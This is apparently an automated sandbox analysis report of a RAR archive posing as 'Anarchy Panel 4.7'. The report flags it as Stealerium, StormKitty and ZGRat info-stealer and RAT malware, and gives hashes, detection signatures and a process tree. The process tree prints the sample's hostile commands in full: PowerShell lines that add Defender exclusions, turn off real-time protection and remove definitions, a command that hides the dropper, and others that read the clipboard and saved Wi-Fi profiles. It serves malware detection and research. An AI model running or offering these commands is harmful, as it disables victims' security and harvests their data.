stealerium | 68ca44633a0ba81b39332cefbc248d31f79cc063ddeb9da91c85bb7a5a88a844

Resubmissions

30-04-2024 20:44

240430-zjmz6shc52 10

30-04-2024 20:43

240430-zh2f6sfe2x 3

Analysis

max time kernel
142s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
30-04-2024 20:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Anarchy_Panel_4.7.rar
Size

62.8MB
MD5

2b646c81ec2a34193035efeb135e67ab
SHA1

d9e0d110e5480956dce126ffd8af079175d6b14a
SHA256

68ca44633a0ba81b39332cefbc248d31f79cc063ddeb9da91c85bb7a5a88a844
SHA512

f0237868c5a6cbb3abaeff66c8edfb765dffe20391329684147f7bf654d3574a3f64314123cc4e617d91a56b8e75d1b942d69f28d47bf119411e6295d89ea978
SSDEEP

1572864:HOnlp4CnbYeGciTeAjyiHSMm2usFndMGW/5MIQhGGu9ZpHQsxgzd:unPpnb7xcTuWG2usFndrWshiJSzd

Score

10^/10

stealerium stormkitty zgrat rat stealer upx

Malware Config

Signatures

Detect ZGRat V1 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe	family_zgrat_v1
behavioral1/memory/5004-310-0x0000000000AA0000-0x000000000413E000-memory.dmp	family_zgrat_v1

Stealerium
An open source info stealer written in C# first seen in May 2022.
stealer stealerium
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\Anarchy Panel 4.7\Plugins\eMTYbTz0gueNs4.dll	family_stormkitty

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe	net_reactor
behavioral1/memory/5004-310-0x0000000000AA0000-0x000000000413E000-memory.dmp	net_reactor

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Anarchy Panel.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	Anarchy Panel.exe

Executes dropped EXE 3 IoCs

Processes:

Anarchy Panel.exeSetup.exeSetup.exe

pid process

2728 Anarchy Panel.exe
4248 Setup.exe
2580 Setup.exe
Loads dropped DLL 5 IoCs

Processes:

Setup.exe

pid process

2580 Setup.exe
2580 Setup.exe
2580 Setup.exe
2580 Setup.exe
2580 Setup.exe

pid	process
2580	Setup.exe
2580	Setup.exe
2580	Setup.exe
2580	Setup.exe
2580	Setup.exe

UPX packed file 18 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI42482\python312.dll	upx
behavioral1/memory/2580-251-0x00007FF96AD00000-0x00007FF96B3D9000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI42482\_ctypes.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI42482\libffi-8.dll	upx
behavioral1/memory/2580-285-0x00007FF988650000-0x00007FF98865F000-memory.dmp	upx
behavioral1/memory/2580-284-0x00007FF975E70000-0x00007FF975E95000-memory.dmp	upx
behavioral1/memory/2580-295-0x00007FF9756A0000-0x00007FF9756CD000-memory.dmp	upx
behavioral1/memory/2580-298-0x00007FF96D070000-0x00007FF96D1E6000-memory.dmp	upx
behavioral1/memory/2580-297-0x00007FF975650000-0x00007FF975674000-memory.dmp	upx
behavioral1/memory/2580-296-0x00007FF975680000-0x00007FF975699000-memory.dmp	upx
behavioral1/memory/2580-300-0x00007FF9853C0000-0x00007FF9853CD000-memory.dmp	upx
behavioral1/memory/2580-299-0x00007FF975630000-0x00007FF975649000-memory.dmp	upx
behavioral1/memory/2580-301-0x00007FF9755F0000-0x00007FF975623000-memory.dmp	upx
behavioral1/memory/2580-303-0x00007FF96A7D0000-0x00007FF96ACF9000-memory.dmp	upx
behavioral1/memory/2580-302-0x00007FF96E030000-0x00007FF96E0FD000-memory.dmp	upx
behavioral1/memory/2580-307-0x00007FF96C840000-0x00007FF96C95B000-memory.dmp	upx
behavioral1/memory/2580-306-0x00007FF984A00000-0x00007FF984A0D000-memory.dmp	upx
behavioral1/memory/2580-305-0x00007FF975360000-0x00007FF975374000-memory.dmp	upx

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

44 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Enumerates processes with tasklist 1 TTPs 3 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exe

pid process

3236 tasklist.exe
1172 tasklist.exe
1588 tasklist.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

4760 systeminfo.exe

flow	ioc
44	ip-api.com

pid	process
3236	tasklist.exe
1172	tasklist.exe
1588	tasklist.exe

pid	process
4760	systeminfo.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

SearchProtocolHost.exeSearchFilterHost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-142 = "Microsoft OneNote Table Of Contents"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{80009818-F38F-4AF1-87B5-EADAB9433E58} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000cc52a76c3f9bda01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-126 = "Microsoft Word Macro-Enabled Template"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.svg	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-123 = "Microsoft Word Document"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aiff\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\msxml3r.dll,-1 = "XML Document"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-913 = "MHTML Document"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\wmphoto.dll,-500 = "Windows Media Photo"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-101 = "Microsoft Excel Worksheet"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\searchfolder.dll,-9023 = "Saved Search"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\MPEG2Demultiplexer	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aiff	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\cabview.dll,-20 = "Cabinet File"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\OpenWithList	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mht\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9937 = "3GPP Audio/Video"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-113 = "Microsoft Excel Binary Worksheet"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-102 = "Microsoft Excel Template"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-170 = "Microsoft PowerPoint 97-2003 Presentation"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-127 = "OpenDocument Text"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-115 = "Microsoft Excel 97-2003 Worksheet"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\windows.storage.dll,-10152 = "File folder"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-140 = "Microsoft OneNote Section"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-172 = "Microsoft PowerPoint 97-2003 Slide Show"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{AEB16279-B750-48F1-8586-97956060175A} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000bb21d36b3f9bda01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-12385 = "Favorites Bar"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9908 = "Wave Sound"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-177 = "Microsoft PowerPoint Macro-Enabled Slide Show"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@windows.storage.dll,-34583 = "Saved Pictures"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{A38B883C-1682-497E-97B0-0A3A9E801682} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 010000000000000025f8636a3f9bda01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-125 = "Microsoft Word Template"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.shtml\OpenWithList	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{487BA7B8-4DB0-465F-B122-C74A445A095D} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000e627fd6c3f9bda01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-178 = "OpenDocument Presentation"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9932 = "MP4 Video"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{97E467B4-98C6-4F19-9588-161B7773D6F6} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000d028386b3f9bda01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\wshext.dll,-4803 = "VBScript Encoded Script File"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Multimedia	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\regedit.exe,-309 = "Registration Entries"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9935 = "MPEG-2 TS Video"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E46787A1-4629-4423-A693-BE1F003B2742} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000007223b46b3f9bda01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@windows.storage.dll,-21825 = "3D Objects"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\Windows.UI.Immersive.dll,-38304 = "Public Account Pictures"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\MPEG2Demultiplexer	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9902 = "Movie Clip"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9925 = "MP3 Format Sound"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\wshext.dll,-4804 = "JavaScript File"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@windows.storage.dll,-21824 = "Camera Roll"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Common Files\system\wab32res.dll,-10100 = "Contacts"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-914 = "SVG Document"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mid\OpenWithList	SearchProtocolHost.exe

Modifies registry class 4 IoCs

Processes:

cmd.exeOpenWith.exeOpenWith.exeOpenWith.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings	OpenWith.exe

Suspicious behavior: EnumeratesProcesses 17 IoCs

Processes:

Anarchy Panel.exe

pid	process
2728	Anarchy Panel.exe
2728	Anarchy Panel.exe
2728	Anarchy Panel.exe
2728	Anarchy Panel.exe
2728	Anarchy Panel.exe
2728	Anarchy Panel.exe
2728	Anarchy Panel.exe
2728	Anarchy Panel.exe
2728	Anarchy Panel.exe
2728	Anarchy Panel.exe
2728	Anarchy Panel.exe
2728	Anarchy Panel.exe
2728	Anarchy Panel.exe
2728	Anarchy Panel.exe
2728	Anarchy Panel.exe
2728	Anarchy Panel.exe
2728	Anarchy Panel.exe

Suspicious use of AdjustPrivilegeToken 31 IoCs

Processes:

SearchIndexer.exe7zG.exeAnarchy Panel.exe

description	pid	process
Token: 33	4436	SearchIndexer.exe
Token: SeIncBasePriorityPrivilege	4436	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4436	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4436	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4436	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4436	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4436	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4436	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4436	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4436	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4436	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4436	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4436	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4436	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4436	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4436	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4436	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4436	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4436	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4436	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4436	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4436	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4436	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4436	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4436	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	4436	SearchIndexer.exe
Token: SeRestorePrivilege	4452	7zG.exe
Token: 35	4452	7zG.exe
Token: SeSecurityPrivilege	4452	7zG.exe
Token: SeSecurityPrivilege	4452	7zG.exe
Token: SeDebugPrivilege	2728	Anarchy Panel.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

7zG.exe

pid process

4452 7zG.exe
Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

OpenWith.exeOpenWith.exeOpenWith.exe

pid process

888 OpenWith.exe
376 OpenWith.exe
376 OpenWith.exe
376 OpenWith.exe
376 OpenWith.exe
376 OpenWith.exe
996 OpenWith.exe

pid	process
4452	7zG.exe

pid	process
888	OpenWith.exe
376	OpenWith.exe
376	OpenWith.exe
376	OpenWith.exe
376	OpenWith.exe
376	OpenWith.exe
996	OpenWith.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

SearchIndexer.exeAnarchy Panel.exeSetup.exe

description	pid	process	target process
PID 4436 wrote to memory of 4560	4436	SearchIndexer.exe	SearchProtocolHost.exe
PID 4436 wrote to memory of 4560	4436	SearchIndexer.exe	SearchProtocolHost.exe
PID 4436 wrote to memory of 2092	4436	SearchIndexer.exe	SearchFilterHost.exe
PID 4436 wrote to memory of 2092	4436	SearchIndexer.exe	SearchFilterHost.exe
PID 2728 wrote to memory of 4248	2728	Anarchy Panel.exe	Setup.exe
PID 2728 wrote to memory of 4248	2728	Anarchy Panel.exe	Setup.exe
PID 4248 wrote to memory of 2580	4248	Setup.exe	Setup.exe
PID 4248 wrote to memory of 2580	4248	Setup.exe	Setup.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

3256 attrib.exe

pid	process
3256	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Anarchy_Panel_4.7.rar
1⤵
- Modifies registry class
PID:448

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:888

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4400

C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\SearchIndexer.exe /Embedding
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4436

C:\Windows\system32\SearchProtocolHost.exe
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
2⤵
- Modifies data under HKEY_USERS
PID:4560

C:\Windows\system32\SearchFilterHost.exe
"C:\Windows\system32\SearchFilterHost.exe" 0 800 804 812 8192 808 784
2⤵
- Modifies data under HKEY_USERS
PID:2092

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:376

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:996

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap24136:92:7zEvent24269
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4452

C:\Users\Admin\Desktop\Anarchy Panel 4.7\Anarchy Panel.exe
"C:\Users\Admin\Desktop\Anarchy Panel 4.7\Anarchy Panel.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2728

C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4248

C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Setup.exe'"
4⤵
PID:3908

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Setup.exe'
5⤵
PID:3224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
4⤵
PID:3116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
5⤵
PID:3660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Setup.exe""
4⤵
PID:4252

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
5⤵
- Views/modifies file attributes
PID:3256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
PID:2392

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
PID:1588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
PID:3964

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
PID:3236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
4⤵
PID:3132

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
5⤵
PID:2016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
4⤵
PID:4792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
PID:876

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
PID:1172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:1000

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:3312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
4⤵
PID:1540

C:\Windows\system32\netsh.exe
netsh wlan show profile
5⤵
PID:4004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
4⤵
PID:4568

C:\Windows\system32\systeminfo.exe
systeminfo
5⤵
- Gathers system information
PID:4760

C:\Windows\system32\cmd.exe
